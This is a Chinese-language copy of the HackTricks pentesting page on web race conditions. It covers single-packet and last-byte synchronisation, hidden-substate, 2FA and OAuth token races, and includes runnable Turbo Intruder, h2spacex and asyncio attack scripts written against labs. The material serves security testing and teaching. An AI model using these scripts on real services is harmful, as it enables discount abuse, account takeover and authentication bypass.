hacktricks/pentesting-web/race-condition.md

19 KiB
Raw Blame History

竞争条件


使用Trickest轻松构建和自动化工作流程,使用世界上最先进的社区工具。
立即获取访问权限:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS Red Team Expert

支持HackTricks的其他方式

{% hint style="warning" %} 要深入了解此技术,请查看原始报告:https://portswigger.net/research/smashing-the-state-machine {% endhint %}

加强竞争条件攻击

利用竞争条件的主要障碍是确保多个请求同时处理,其处理时间之间非常短—理想情况下小于1毫秒

以下是一些同步请求的技术:

HTTP/2单数据包攻击 vs. HTTP/1.1最后字节同步

  • HTTP/2支持通过单个TCP连接发送两个请求减少网络抖动的影响。然而由于服务器端的变化两个请求可能不足以实现一致的竞争条件利用。
  • HTTP/1.1 '最后字节同步'允许预先发送大部分20-30个请求的内容保留一个小片段然后一起发送实现同时到达服务器。

准备进行最后字节同步包括:

  1. 发送标题和主体数据,减去最后一个字节,而不结束流。
  2. 初始发送后暂停100毫秒。
  3. 禁用TCP_NODELAY以利用Nagle算法批处理最终帧。
  4. 发送ping以热身连接。

随后发送被保留的帧应导致它们以单个数据包的形式到达可通过Wireshark验证。此方法不适用于通常不涉及RC攻击的静态文件。

适应服务器架构

了解目标的架构至关重要。前端服务器可能会以不同方式路由请求,影响时间。通过无关紧要的请求进行预先的服务器端连接热身,可能会使请求时间正常化。

处理基于会话的锁定

像PHP的会话处理程序会根据会话序列化请求可能会隐藏漏洞。为每个请求使用不同的会话令牌可以规避此问题。

克服速率或资源限制

如果连接热身无效通过故意触发Web服务器的速率或资源限制延迟通过洪水式的虚拟请求可能有助于通过引发有利于竞争条件的服务器端延迟来促进单数据包攻击。

攻击示例

  • Tubo Intruder - HTTP2单数据包攻击1个端点:您可以将请求发送到Turbo intruderExtensions -> Turbo Intruder -> Send to Turbo Intruder),您可以更改请求中要暴力破解的值为**%s,如csrf=Bn9VQB8OyefIs3ShR2fPESR0FzzulI1d&username=carlos&password=%s,然后从下拉菜单中选择examples/race-single-packer-attack.py**

如果您要发送不同的值,您可以修改代码,使用从剪贴板中获取的单词列表:

passwords = wordlists.clipboard
for password in passwords:
engine.queue(target.req, password, gate='race1')

{% hint style="warning" %} 如果网站不支持HTTP2仅支持HTTP1.1),请使用Engine.THREADEDEngine.BURP,而不是Engine.BURP2。 {% endhint %}

  • Tubo Intruder - HTTP2单数据包攻击多个端点如果您需要向一个端点发送请求然后向其他端点发送多个请求以触发RCE您可以修改race-single-packet-attack.py脚本如下:
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=1,
engine=Engine.BURP2
)

# Hardcode the second request for the RC
confirmationReq = '''POST /confirm?token[]= HTTP/2
Host: 0a9c00370490e77e837419c4005900d0.web-security-academy.net
Cookie: phpsessionid=MpDEOYRvaNT1OAm0OtAsmLZ91iDfISLU
Content-Length: 0

'''

# For each attempt (20 in total) send 50 confirmation requests.
for attempt in range(20):
currentAttempt = str(attempt)
username = 'aUser' + currentAttempt

# queue a single registration request
engine.queue(target.req, username, gate=currentAttempt)

# queue 50 confirmation requests - note that this will probably sent in two separate packets
for i in range(50):
engine.queue(confirmationReq, gate=currentAttempt)

# send all the queued requests for this attempt
engine.openGate(currentAttempt)
  • 在Burp Suite中Repeater 还可以通过新的 '并行发送组' 选项使用。
  • 对于 limit-overrun,您可以在组中添加相同的请求50次
  • 对于 connection warming,您可以在组的开头添加一些请求到 Web 服务器的一些非静态部分。
  • 为了延迟在处理一个请求和另一个请求之间的过程在2个子状态步骤中您可以在这两个请求之间添加额外的请求
  • 对于多端点的 RC您可以开始发送进入隐藏状态的请求,然后在其后立即发送50个利用隐藏状态的请求
  • 自动化 Python 脚本:此脚本的目标是在不断验证的同时更改用户的电子邮件,直到新电子邮件的验证令牌到达最后一个电子邮件(这是因为在代码中看到了一个 RC在这个 RC 中可以修改电子邮件,但是验证令牌发送到旧电子邮件,因为指示电子邮件的变量已经填充了第一个电子邮件)。
    当在收到的电子邮件中找到单词 "objetivo" 时,我们知道收到了更改电子邮件的验证令牌,然后结束攻击。
# https://portswigger.net/web-security/race-conditions/lab-race-conditions-limit-overrun
# Script from victor to solve a HTB challenge
from h2spacex import H2OnTlsConnection
from time import sleep
from h2spacex import h2_frames
import requests

cookie="session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MiwiZXhwIjoxNzEwMzA0MDY1LCJhbnRpQ1NSRlRva2VuIjoiNDJhMDg4NzItNjEwYS00OTY1LTk1NTMtMjJkN2IzYWExODI3In0.I-N93zbVOGZXV_FQQ8hqDMUrGr05G-6IIZkyPwSiiDg"

# change these headers

headersObjetivo= """accept: */*
content-type: application/x-www-form-urlencoded
Cookie: """+cookie+"""
Content-Length: 112
"""

bodyObjetivo = 'email=objetivo%40apexsurvive.htb&username=estes&fullName=test&antiCSRFToken=42a08872-610a-4965-9553-22d7b3aa1827'

headersVerification= """Content-Length: 1
Cookie: """+cookie+"""
"""
CSRF="42a08872-610a-4965-9553-22d7b3aa1827"

host = "94.237.56.46"
puerto =39697


url = "https://"+host+":"+str(puerto)+"/email/"

response = requests.get(url, verify=False)


while "objetivo" not in response.text:

urlDeleteMails = "https://"+host+":"+str(puerto)+"/email/deleteall/"

responseDeleteMails = requests.get(urlDeleteMails, verify=False)
#print(response.text)
# change this host name to new generated one

Headers = { "Cookie" : cookie, "content-type": "application/x-www-form-urlencoded" }
data="email=test%40email.htb&username=estes&fullName=test&antiCSRFToken="+CSRF
urlReset="https://"+host+":"+str(puerto)+"/challenge/api/profile"
responseReset = requests.post(urlReset, data=data, headers=Headers, verify=False)

print(responseReset.status_code)

h2_conn = H2OnTlsConnection(
hostname=host,
port_number=puerto
)

h2_conn.setup_connection()

try_num = 100

stream_ids_list = h2_conn.generate_stream_ids(number_of_streams=try_num)

all_headers_frames = []  # all headers frame + data frames which have not the last byte
all_data_frames = []  # all data frames which contain the last byte


for i in range(0, try_num):
last_data_frame_with_last_byte=''
if i == try_num/2:
header_frames_without_last_byte, last_data_frame_with_last_byte = h2_conn.create_single_packet_http2_post_request_frames(  # noqa: E501
method='POST',
headers_string=headersObjetivo,
scheme='https',
stream_id=stream_ids_list[i],
authority=host,
body=bodyObjetivo,
path='/challenge/api/profile'
)
else:
header_frames_without_last_byte, last_data_frame_with_last_byte = h2_conn.create_single_packet_http2_post_request_frames(
method='GET',
headers_string=headersVerification,
scheme='https',
stream_id=stream_ids_list[i],
authority=host,
body=".",
path='/challenge/api/sendVerification'
)

all_headers_frames.append(header_frames_without_last_byte)
all_data_frames.append(last_data_frame_with_last_byte)


# concatenate all headers bytes
temp_headers_bytes = b''
for h in all_headers_frames:
temp_headers_bytes += bytes(h)

# concatenate all data frames which have last byte
temp_data_bytes = b''
for d in all_data_frames:
temp_data_bytes += bytes(d)

h2_conn.send_bytes(temp_headers_bytes)




# wait some time
sleep(0.1)

# send ping frame to warm up connection
h2_conn.send_ping_frame()

# send remaining data frames
h2_conn.send_bytes(temp_data_bytes)

resp = h2_conn.read_response_from_socket(_timeout=3)
frame_parser = h2_frames.FrameParser(h2_connection=h2_conn)
frame_parser.add_frames(resp)
frame_parser.show_response_of_sent_requests()

print('---')

sleep(3)
h2_conn.close_connection()

response = requests.get(url, verify=False)

原始 BF

在之前的研究之前,这些是一些使用的有效载荷,只是尝试尽可能快地发送数据包以引发 RC。

  • **Repeater**查看上一节中的示例。
  • Intruder请求发送到Intruder,在选项菜单中将线程数设置为30,选择有效载荷为空有效载荷并生成30
  • Turbo Intruder
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=5,
requestsPerConnection=1,
pipeline=False
)
a = ['Session=<session_id_1>','Session=<session_id_2>','Session=<session_id_3>']
for i in range(len(a)):
engine.queue(target.req,a[i], gate='race1')
# open TCP connections and send partial requests
engine.start(timeout=10)
engine.openGate('race1')
engine.complete(timeout=60)

def handleResponse(req, interesting):
table.add(req)
  • Python - asyncio
import asyncio
import httpx

async def use_code(client):
resp = await client.post(f'http://victim.com', cookies={"session": "asdasdasd"}, data={"code": "123123123"})
return resp.text

async def main():
async with httpx.AsyncClient() as client:
tasks = []
for _ in range(20): #20 times
tasks.append(asyncio.ensure_future(use_code(client)))

# Get responses
results = await asyncio.gather(*tasks, return_exceptions=True)

# Print results
for r in results:
print(r)

# Async2sync sleep
await asyncio.sleep(0.5)
print(results)

asyncio.run(main())

RC Methodology

限制超限/TOCTOU

这是最基本的一种竞争条件,其中漏洞出现在限制执行某个操作次数的地方。比如在网店多次使用相同的折扣代码。一个非常简单的例子可以在这份报告这个漏洞中找到

这种攻击有许多变种,包括:

  • 多次兑换礼品卡
  • 多次评价产品
  • 超出账户余额提取或转账现金
  • 重复使用单个验证码解决方案
  • 绕过反暴力破解速率限制

隐藏子状态

利用复杂的竞争条件通常涉及利用与隐藏或意外的机器子状态交互的短暂机会。以下是处理此类情况的方法:

  1. 识别潜在的隐藏子状态
  • 首先,确定修改或与关键数据交互的端点,如用户配置文件或密码重置流程。关注以下方面:
  • 存储:优先选择处理服务器端持久数据的端点,而不是处理客户端数据的端点。
  • 操作:寻找修改现有数据的操作,这些操作比添加新数据的操作更有可能创建可利用的条件。
  • 键入:成功的攻击通常涉及使用相同标识符(例如用户名或重置令牌)的操作。
  1. 进行初步探测
  • 使用竞争条件攻击测试已识别的端点,观察是否有与预期结果不符的情况。意外的响应或应用行为的变化可能表明存在漏洞。
  1. 展示漏洞
  • 将攻击范围缩小到利用漏洞所需的最少请求数,通常仅为两个。由于涉及精确的时机,此步骤可能需要多次尝试或自动化。

时间敏感攻击

在定时请求方面的精确性可以揭示漏洞,特别是在安全令牌使用可预测的方法(如时间戳)时。例如,基于时间戳生成密码重置令牌可能允许同时请求相同的令牌。

利用方法:

  • 使用精确的时机,如单个数据包攻击,进行并发密码重置请求。相同的令牌表明存在漏洞。

示例:

  • 同时请求两个密码重置令牌并进行比较。匹配的令牌表明令牌生成存在缺陷。

查看此 PortSwigger实验室 以尝试此操作。

隐藏子状态案例研究

支付并添加商品

查看此 PortSwigger实验室 以了解如何在商店中支付添加额外的商品而无需为其付款

确认其他电子邮件

这个想法是验证一个电子邮件地址并同时将其更改为另一个,以查看平台是否验证更改后的新电子邮件。

将电子邮件更改为2个电子邮件地址基于Cookie

根据这项研究Gitlab容易受到这种方式的接管因为它可能会将一个电子邮件的电子邮件验证令牌发送到另一个电子邮件

查看此 PortSwigger实验室 以尝试此操作。

隐藏数据库状态/确认绕过

如果使用2个不同的写入数据库添加信息,则在仅有第一个数据被写入数据库的一小段时间内。例如,创建用户时用户名密码可能会被写入,然后写入确认新创建帐户的令牌。这意味着在短时间内用于确认帐户的令牌为空

因此,注册一个帐户并发送多个带有空令牌的请求token=token[]=或任何其他变体)立即确认帐户可能允许确认一个您无法控制电子邮件的帐户。

查看此 PortSwigger实验室 以尝试此操作。

绕过2FA

以下伪代码容易受到竞争条件的影响,因为在非常短的时间内2FA未被强制执行而会创建会话:

session['userid'] = user.userid
if user.mfa_enabled:
session['enforce_mfa'] = True
# generate and send MFA code to user
# redirect browser to MFA code entry form

OAuth2永久性持久性

有几个OAUth提供商。这些服务将允许您创建一个应用程序并对提供商已注册的用户进行身份验证。为了做到这一点,客户端将需要允许您的应用程序访问OAUth提供商内部的一些数据。
因此直到这里只是一个常见的使用google/linkedin/github等登录您会看到一个页面上面写着应用程序<InsertCoolName>想要访问您的信息,您是否要允许?

authorization_code中的竞争条件

问题出现在您接受并自动向恶意应用程序发送**authorization_code时。然后,此应用程序滥用OAUth服务提供商中的竞争条件**,从**authorization_code为您的帐户生成多个AT/RT身份验证令牌/刷新令牌)。基本上,它将滥用您已经允许应用程序访问您的数据的事实来创建多个帐户**。然后,如果您停止允许应用程序访问您的数据一个AT/RT对将被删除但其他对仍然有效

Refresh Token中的竞争条件

一旦您获得了有效的RT,您可以尝试滥用它来生成多个AT/RT,即使用户取消了恶意应用程序访问其数据的权限,多个RT仍然有效

WebSockets中的RC

WS_RaceCondition_PoC您可以找到一个Java PoC用于并行发送websocket消息以滥用Web Sockets中的竞争条件

参考资料

从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS Red Team Expert

支持HackTricks的其他方式


使用Trickest可以轻松构建和自动化工作流程,使用世界上最先进的社区工具。
立即获取访问权限:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}